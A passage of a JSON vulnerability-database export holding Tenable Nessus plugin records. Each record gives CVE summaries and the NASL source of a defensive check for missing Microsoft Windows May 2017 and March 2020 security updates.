script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS17-05';\nkbs = make_list(\n '4019214', # 2012 Monthly Rollup\n '4019216' # 2012 Security Rollup\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(exit_on_fail:TRUE, as_share:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif ( smb_check_rollup(os:\"6.2\", sp:0, rollup_date: \"05_2017\", bulletin:bulletin, rollup_kb_list:[4019214,4019216]) )\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-30T17:09:27", "description": "The remote Windows host is missing security update 4019263 or cumulative update 4019264. It is, therefore, affected by multiple vulnerabilities :\n\n - A denial of service vulnerability exists in the Windows DNS server when it's configured to answer version queries. 
An unauthenticated, remote attacker can exploit this, via a malicious DNS query, to cause the DNS server to become nonresponsive. (CVE-2017-0171)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0175)\n\n - An elevation of privilege vulnerability exists in the Windows COM Aggregate Marshaler due to an unspecified flaw. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in Windows due to improper validation of user-supplied input when loading type libraries. A local attacker can exploit this, via a specially crafted application, to gain elevated privileges. (CVE-2017-0214)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0220)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0222)\n\n - A spoofing vulnerability exists in Microsoft browsers due to improper rendering of the SmartScreen filter. An unauthenticated, remote attacker can exploit this, via a specially crafted URL, to redirect users to a malicious website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. 
An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. 
An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0280)\n\n - An information disclosure vulnerability exists in the GDI component due to improper handling of objects in memory. 
An unauthenticated, remote attacker can exploit this, by convincing a user to open a specially crafted document or visit a specially crafted website, to disclose the contents of memory. (CVE-2017-8552)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-09T00:00:00", "type": "nessus", "title": "Windows 7 and Windows Server 2008 R2 May 2017 Security Updates", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0171", "CVE-2017-0175", "CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0220", "CVE-2017-0222", "CVE-2017-0231", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280", "CVE-2017-8552"], "modified": "2022-03-29T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_MAY_4019264.NASL", "href": "https://www.tenable.com/plugins/nessus/100058", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100058);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/29\");\n\n script_cve_id(\n \"CVE-2017-0171\",\n \"CVE-2017-0175\",\n \"CVE-2017-0213\",\n \"CVE-2017-0214\",\n \"CVE-2017-0220\",\n \"CVE-2017-0222\",\n \"CVE-2017-0231\",\n \"CVE-2017-0267\",\n \"CVE-2017-0268\",\n \"CVE-2017-0269\",\n \"CVE-2017-0270\",\n \"CVE-2017-0271\",\n \"CVE-2017-0272\",\n \"CVE-2017-0273\",\n \"CVE-2017-0274\",\n \"CVE-2017-0275\",\n \"CVE-2017-0276\",\n \"CVE-2017-0277\",\n \"CVE-2017-0278\",\n \"CVE-2017-0279\",\n \"CVE-2017-0280\",\n \"CVE-2017-8552\"\n );\n script_bugtraq_id(\n 98097,\n 98102,\n 98103,\n 98110,\n 98111,\n 98127,\n 98173,\n 98259,\n 98260,\n 98261,\n 98263,\n 98264,\n 98265,\n 98266,\n 98267,\n 98268,\n 98270,\n 98271,\n 98272,\n 
98273,\n 98274\n );\n script_xref(name:\"MSKB\", value:\"4019263\");\n script_xref(name:\"MSKB\", value:\"4019264\");\n script_xref(name:\"MSFT\", value:\"MS17-4019263\");\n script_xref(name:\"MSFT\", value:\"MS17-4019264\");\n script_xref(name:\"IAVA\", value:\"2017-A-0148\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n\n script_name(english:\"Windows 7 and Windows Server 2008 R2 May 2017 Security Updates\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4019263\nor cumulative update 4019264. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A denial of service vulnerability exists in the Windows\n DNS server when it's configured to answer version\n queries. An unauthenticated, remote attacker can exploit\n this, via a malicious DNS query, to cause the DNS server\n to become nonresponsive. (CVE-2017-0171)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0175)\n\n - An elevation of privilege vulnerability exists in the\n Windows COM Aggregate Marshaler due to an unspecified\n flaw. A local attacker can exploit this, via a specially\n crafted application, to execute arbitrary code with\n elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper validation of user-supplied\n input when loading type libraries. A local attacker can\n exploit this, via a specially crafted application, to\n gain elevated privileges. 
(CVE-2017-0214)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0220)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0222)\n\n - A spoofing vulnerability exists in Microsoft browsers\n due to improper rendering of the SmartScreen filter. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted URL, to redirect users to a malicious\n website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. 
An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. 
An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0280)\n\n - An information disclosure vulnerability exists in the\n GDI component due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n this, by convincing a user to open a specially crafted\n document or visit a specially crafted website, to\n disclose the contents of memory. 
(CVE-2017-8552)\");\n # https://support.microsoft.com/en-us/help/4019264/windows-7-update-kb4019264\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?89dd1a9e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4019263 or Cumulative update KB4019264.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0272\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\n## NB: Microsoft\nbulletin = 'MS17-05';\nkbs = make_list(\"4019264\", \"4019263\");\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\n# KB only applies to Window 7 / 2008 R2, SP1\nif (hotfix_check_sp_range(win7:'1') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 7 / 2008 R2\n smb_check_rollup(os:\"6.1\", sp:1, rollup_date:\"05_2017\", bulletin:bulletin, rollup_kb_list:[4019264, 4019263])\n)\n{\n replace_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T15:28:16", "description": "The remote Windows host is missing security update 4541504 or cumulative update 4541506. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the Windows ActiveX Installer Service improperly handles memory. (CVE-2020-0770)\n\n - A tampering vulnerability exists when Microsoft IIS Server improperly handles malformed request headers. 
An attacker who successfully exploited the vulnerability could cause a vulnerable server to improperly process HTTP headers and tamper with the responses returned to clients. (CVE-2020-0645)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when MSI packages process symbolic links. An attacker who successfully exploited this vulnerability could bypass access restrictions to add or remove files. (CVE-2020-0779)\n\n - An elevation of privilege vulnerability exists when the Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-0791)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0847)\n\n - An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations. (CVE-2020-0814, CVE-2020-0842, CVE-2020-0843)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0832)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting improperly handles memory.\n (CVE-2020-0772)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. 
An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-0880, CVE-2020-0882)\n\n - An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) improperly handles symbolic links. An attacker who successfully exploited this vulnerability could overwrite a targeted file leading to an elevated status.\n (CVE-2020-0787)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2020-0874)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0881, CVE-2020-0883)\n\n - An elevation of privilege vulnerability exists when the Windows CSC Service improperly handles memory.\n (CVE-2020-0769, CVE-2020-0771)\n\n - An information disclosure vulnerability exists in Windows when the Windows Imaging Component fails to properly handle objects in memory. 
An attacker who successfully exploited this vulnerability could obtain information to further compromise the user's system.\n There are multiple ways an attacker could exploit this vulnerability: (CVE-2020-0853)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles hard links. An attacker who successfully exploited this vulnerability could overwrite a targeted file leading to an elevated status.\n (CVE-2020-0849)\n\n - An elevation of privilege vulnerability exists when the Windows Language Pack Installer improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Language Pack Installer handles file operations. (CVE-2020-0822)\n\n - A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. (CVE-2020-0684)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0788, CVE-2020-0877, CVE-2020-0887)\n\n - An elevation of privilege vulnerability exists when the Windows Universal Plug and Play (UPnP) service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. 
(CVE-2020-0781, CVE-2020-0783)", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-03-24T00:00:00", "type": "nessus", "title": "KB4541504: Windows Server 2008 March 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0645", "CVE-2020-0684", "CVE-2020-0769", "CVE-2020-0770", "CVE-2020-0771", "CVE-2020-0772", "CVE-2020-0779", "CVE-2020-0781", "CVE-2020-0783", "CVE-2020-0787", "CVE-2020-0788", "CVE-2020-0791", "CVE-2020-0814", "CVE-2020-0822", "CVE-2020-0832", "CVE-2020-0842", "CVE-2020-0843", "CVE-2020-0847", "CVE-2020-0849", "CVE-2020-0853", "CVE-2020-0874", "CVE-2020-0877", "CVE-2020-0880", "CVE-2020-0881", "CVE-2020-0882", "CVE-2020-0883", "CVE-2020-0887"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_MAR_4541506.NASL", "href": "https://www.tenable.com/plugins/nessus/134866", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(134866);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2020-0645\",\n \"CVE-2020-0684\",\n \"CVE-2020-0769\",\n \"CVE-2020-0770\",\n \"CVE-2020-0771\",\n \"CVE-2020-0772\",\n \"CVE-2020-0779\",\n \"CVE-2020-0781\",\n \"CVE-2020-0783\",\n \"CVE-2020-0787\",\n \"CVE-2020-0788\",\n \"CVE-2020-0791\",\n \"CVE-2020-0814\",\n \"CVE-2020-0822\",\n \"CVE-2020-0832\",\n \"CVE-2020-0842\",\n \"CVE-2020-0843\",\n \"CVE-2020-0847\",\n \"CVE-2020-0849\",\n \"CVE-2020-0853\",\n \"CVE-2020-0874\",\n \"CVE-2020-0877\",\n \"CVE-2020-0880\",\n \"CVE-2020-0881\",\n \"CVE-2020-0882\",\n \"CVE-2020-0883\",\n \"CVE-2020-0887\"\n );\n script_xref(name:\"MSKB\", value:\"4541506\");\n script_xref(name:\"MSKB\", value:\"4541504\");\n script_xref(name:\"MSFT\", value:\"MS20-4541506\");\n script_xref(name:\"MSFT\", value:\"MS20-4541504\");\n script_xref(name:\"IAVA\", value:\"2020-A-0139-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"KB4541504: Windows Server 2008 March 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4541504\nor cumulative update 4541506. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the\n Windows ActiveX Installer Service improperly handles\n memory. (CVE-2020-0770)\n\n - A tampering vulnerability exists when Microsoft IIS\n Server improperly handles malformed request headers. 
An\n attacker who successfully exploited the vulnerability\n could cause a vulnerable server to improperly process\n HTTP headers and tamper with the responses returned to\n clients. (CVE-2020-0645)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when MSI packages process symbolic\n links. An attacker who successfully exploited this\n vulnerability could bypass access restrictions to add or\n remove files. (CVE-2020-0779)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-0791)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-0847)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-0814,\n CVE-2020-0842, CVE-2020-0843)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0832)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles memory.\n (CVE-2020-0772)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. 
An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the user's system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-0880, CVE-2020-0882)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n improperly handles symbolic links. An attacker who\n successfully exploited this vulnerability could\n overwrite a targeted file leading to an elevated status.\n (CVE-2020-0787)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2020-0874)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0881,\n CVE-2020-0883)\n\n - An elevation of privilege vulnerability exists when the\n Windows CSC Service improperly handles memory.\n (CVE-2020-0769, CVE-2020-0771)\n\n - An information disclosure vulnerability exists in\n Windows when the Windows Imaging Component fails to\n properly handle objects in memory. 
An attacker who\n successfully exploited this vulnerability could obtain\n information to further compromise the user's system.\n There are multiple ways an attacker could exploit this\n vulnerability: (CVE-2020-0853)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles hard links. An attacker who\n successfully exploited this vulnerability could\n overwrite a targeted file leading to an elevated status.\n (CVE-2020-0849)\n\n - An elevation of privilege vulnerability exists when the\n Windows Language Pack Installer improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Language Pack Installer\n handles file operations. (CVE-2020-0822)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-0684)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0788, CVE-2020-0877,\n CVE-2020-0887)\n\n - An elevation of privilege vulnerability exists when the\n Windows Universal Plug and Play (UPnP) service\n improperly handles objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges. 
